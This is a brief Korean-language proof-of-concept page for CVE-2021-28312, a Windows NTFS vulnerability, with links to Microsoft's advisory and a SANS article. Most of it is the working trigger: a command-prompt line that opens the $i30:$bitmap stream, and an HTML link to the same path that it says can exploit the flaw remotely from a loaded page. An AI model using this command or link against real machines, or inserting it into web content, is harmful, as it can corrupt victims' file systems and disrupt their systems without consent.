
CVE-2021-28312에 대한 POC 및 설명
CVE-2021-28312에 대한 POC 및 설명
링크: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28312
명령 프롬프트에서: 다음 명령어를 입력하세요 cd c:\:$i30:$bitmap
원격 악용 가능성: 로컬에 로드된 페이지에 다음 링크를 추가하여 수행할 수 있습니다
<a href="file:\\c:\:$i30:$bitmap">Click here</a>
$i30 속성에 대한 자세한 내용: https://www.sans.org/blog/ntfs-i30-index-attributes-evidence-of-deleted-and-overwritten-files/